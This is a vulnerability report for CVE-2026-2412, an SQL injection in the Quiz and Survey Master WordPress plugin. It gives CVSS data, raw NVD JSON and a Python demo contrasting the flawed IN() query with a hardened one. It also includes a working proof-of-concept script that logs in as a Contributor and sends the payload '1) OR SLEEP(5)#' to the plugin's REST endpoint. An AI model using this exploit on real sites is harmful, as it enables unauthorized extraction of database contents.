Security Vulnerability Report
CVE-2026-2412 (CVSS 6.5 MEDIUM, CWE-89: SQL Injection)

Published: 2026-03-23 23:17:11
Last Modified: 2026-04-24 16:32:54

Description

The Quiz and Survey Master (QSM) plugin for WordPress is vulnerable to SQL Injection via the 'merged_question' parameter in all versions up to, and including, 10.3.5. This is due to insufficient sanitization of user-supplied input before being used in a SQL query. The sanitize_text_field() function applied to the merged_question parameter does not prevent SQL metacharacters like ), OR, AND, and # from being included in the value, which is then directly concatenated into a SQL IN() clause without using $wpdb->prepare() or casting values to integers. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
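To make the root cause concrete, the following added example (written for this page, not code from the plugin, from Wordfence or from WordPress core) re-implements the documented steps of WordPress's sanitize_text_field() in Python and then runs the flawed IN() construction and a hardened one against an in-memory SQLite table. SQLite stands in for MySQL and $wpdb, so the injected tail used against the database is `OR 1=1 --` rather than the MySQL-only `#` comment and SLEEP(); the table name, column names and rows are constructed for the demo and are not the plugin's schema, and the sanitizer is an approximation of WordPress's behaviour, not its exact code.

```python
import re
import sqlite3

# Payloads: the first is the advisory's MySQL time-based probe, the second a
# SQLite-compatible tail (SQLite has no SLEEP() and no '#' line comments).
MYSQL_PAYLOAD = "1) OR SLEEP(5)#"
SQLITE_PAYLOAD = "1) OR 1=1 --"


def approx_sanitize_text_field(value: str) -> str:
    """Approximation of WordPress sanitize_text_field() (not its exact code):
    strips script/style blocks and tags when '<' is present, collapses line
    breaks/tabs/spaces, trims, and removes percent-encoded octets such as %20.
    None of these steps touches ')', 'OR', '=', '--', '#' or quotes, which is
    exactly why it is the wrong tool for a value that lands inside SQL."""
    if "<" in value:
        value = re.sub(r"<(script|style)[^>]*?>.*?</\1>", "", value, flags=re.I | re.S)
        value = re.sub(r"<[^>]*>", "", value)
    value = re.sub(r"[\r\n\t ]+", " ", value).strip()
    found = False
    while True:
        m = re.search(r"%[a-f0-9]{2}", value, flags=re.I)
        if not m:
            break
        value = value.replace(m.group(0), "")
        found = True
    if found:
        value = re.sub(r" +", " ", value).strip()
    return value


# Constructed rows standing in for the plugin's questions table (assumed names).
ROWS = [
    (1, "What is 2+2?", "public-quiz"),
    (2, "Capital of France?", "public-quiz"),
    (3, "Unpublished: Q3 pricing answer", "draft-quiz"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE questions (question_id INTEGER PRIMARY KEY, question_name TEXT, quiz TEXT)")
    conn.executemany("INSERT INTO questions VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_fetch(conn: sqlite3.Connection, merged_question: str) -> list:
    """The flawed pattern the advisory describes: sanitized text concatenated
    straight into IN() with no prepare() and no integer cast."""
    sanitized = approx_sanitize_text_field(merged_question)
    sql = ("SELECT question_id, question_name FROM questions "
           f"WHERE question_id IN ({sanitized})")
    return conn.execute(sql).fetchall()


def parse_id_list(merged_question: str) -> list:
    """Strict allow-list: comma-separated non-negative integers only.
    PHP's absint() would silently coerce '1) OR ...' to 1; rejecting the
    request outright is stronger and makes probing visible in logs."""
    ids = []
    for part in merged_question.split(","):
        part = part.strip()
        if not re.fullmatch(r"[0-9]+", part):
            raise ValueError(f"merged_question element is not an integer: {part!r}")
        ids.append(int(part))
    return ids


def hardened_fetch(conn: sqlite3.Connection, merged_question: str) -> list:
    """Fixed version: validated integers bound through placeholders, the
    equivalent of $wpdb->prepare() with one %d placeholder per element."""
    ids = parse_id_list(merged_question)
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT question_id, question_name FROM questions "
           f"WHERE question_id IN ({placeholders})")
    return conn.execute(sql, ids).fetchall()


def demo() -> dict:
    conn = make_db()
    out = {
        # sanitize_text_field() passes both injection strings through untouched
        "mysql_payload_survives": approx_sanitize_text_field(MYSQL_PAYLOAD) == MYSQL_PAYLOAD,
        "sqlite_payload_survives": approx_sanitize_text_field(SQLITE_PAYLOAD) == SQLITE_PAYLOAD,
        # even when it does strip something, the SQL tokens remain intact
        "stripped_but_still_sql": approx_sanitize_text_field("1) OR <script>x</script>1=1%20--"),
        # the vulnerable query returns every row, not just question 1
        "vulnerable_rows": vulnerable_fetch(conn, SQLITE_PAYLOAD),
        "hardened_rows": hardened_fetch(conn, "1, 2"),
        "hardened_rejects_payload": False,
    }
    try:
        hardened_fetch(conn, SQLITE_PAYLOAD)
    except ValueError:
        out["hardened_rejects_payload"] = True
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running `demo()` shows the two halves of the bug: the sanitizer leaves `1) OR SLEEP(5)#` byte-for-byte unchanged, and the concatenated query `... WHERE question_id IN (1) OR 1=1 --)` returns all three rows including the unpublished one. The hardened path is the WordPress-side pattern of validating each element as an integer and binding the list through `$wpdb->prepare()` with `%d` placeholders; a value that is not a plain integer never reaches the database.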

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available in the NVD record (vulnStatus: Deferred); the affected range stated in the description is:

Quiz and Survey Master (QSM) <= 10.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-2412: Authenticated SQL Injection in QSM Plugin
import requests
import sys


def exploit(url, username, password):
    session = requests.Session()

    # 1. Login as Contributor (low-privilege user)
    login_url = f"{url}/wp-login.php"
    login_data = {
        "log": username,
        "pwd": password,
        "redirect_to": f"{url}/wp-admin/",
        "testcookie": "1",
    }
    # wp-login.php answers "Cookies are blocked" unless the test cookie it
    # sets on GET is present, so fetch the form once before posting.
    session.get(login_url)
    print(f"[*] Logging in as {username}...")
    session.post(login_url, data=login_data)

    # Check if login succeeded: WordPress sets a wordpress_logged_in_<hash>
    # cookie on success (there is no cookie named 'wp-admin').
    if not any(name.startswith("wordpress_logged_in_") for name in session.cookies.get_dict()):
        print("[-] Login failed.")
        return

    # 2. Send payload to the vulnerable endpoint.
    # The vulnerability is in the 'merged_question' parameter.
    # Payload: 1) OR SLEEP(5)# to test for time-based blind injection.
    # Endpoint might vary based on plugin version; the rest-api.php reference
    # in this report points at the route registration.
    target_endpoint = f"{url}/wp-json/qsm/v1/questions/merge"
    payload = "1) OR SLEEP(5)#"

    # Cookie-authenticated REST requests are treated as anonymous unless a
    # valid X-WP-Nonce accompanies them; core's rest-nonce AJAX action returns one.
    nonce = session.get(f"{url}/wp-admin/admin-ajax.php", params={"action": "rest-nonce"}).text.strip()
    headers = {
        "Content-Type": "application/json",
        "X-WP-Nonce": nonce,
    }
    data = {"merged_question": payload}

    print(f"[*] Sending payload to {target_endpoint}")
    try:
        response = session.post(target_endpoint, json=data, headers=headers, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Vulnerability confirmed! Response delayed by 5 seconds.")
        else:
            print("[-] Vulnerability not triggered or patched.")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <url> <username> <password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/classes/class-qsm-questions.php#L387 (affected code in 10.3.5, class-qsm-questions.php)
https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/rest-api.php#L760 (affected code in 10.3.5, rest-api.php)
https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/classes/class-qsm-questions.php (changeset 3486710, class-qsm-questions.php)
https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/rest-api.php (changeset 3486710, rest-api.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/b32bf1cb-3722-41fc-be51-dabe80416b14?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-2412",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T23:17:11.287",
    "lastModified": "2026-04-24T16:32:53.997",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Quiz and Survey Master (QSM) plugin for WordPress is vulnerable to SQL Injection via the 'merged_question' parameter in all versions up to, and including, 10.3.5. This is due to insufficient sanitization of user-supplied input before being used in a SQL query. The sanitize_text_field() function applied to the merged_question parameter does not prevent SQL metacharacters like ), OR, AND, and # from being included in the value, which is then directly concatenated into a SQL IN() clause without using $wpdb->prepare() or casting values to integers. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      },
      {
        "lang": "es",
        "value": "El plugin Quiz and Survey Master (QSM) para WordPress es vulnerable a inyección SQL a través del parámetro 'merged_question' en todas las versiones hasta la 10.3.5, inclusive. Esto se debe a una sanitización insuficiente de la entrada proporcionada por el usuario antes de ser utilizada en una consulta SQL. La función sanitize_text_field() aplicada al parámetro merged_question no evita que metacaracteres SQL como ), OR, AND y # se incluyan en el valor, el cual es luego concatenado directamente en una cláusula SQL IN() sin usar $wpdb->prepare() ni convertir valores a enteros. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, añadan consultas SQL adicionales en consultas ya existentes que pueden ser utilizadas para extraer información sensible de la base de datos."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/classes/class-qsm-questions.php#L387", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/quiz-master-next/tags/10.3.5/php/rest-api.php#L760", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/classes/class-qsm-questions.php", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3486710/quiz-master-next/trunk/php/rest-api.php", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b32bf1cb-3722-41fc-be51-dabe80416b14?source=cve", "source": "[email protected]"}
    ]
  }
}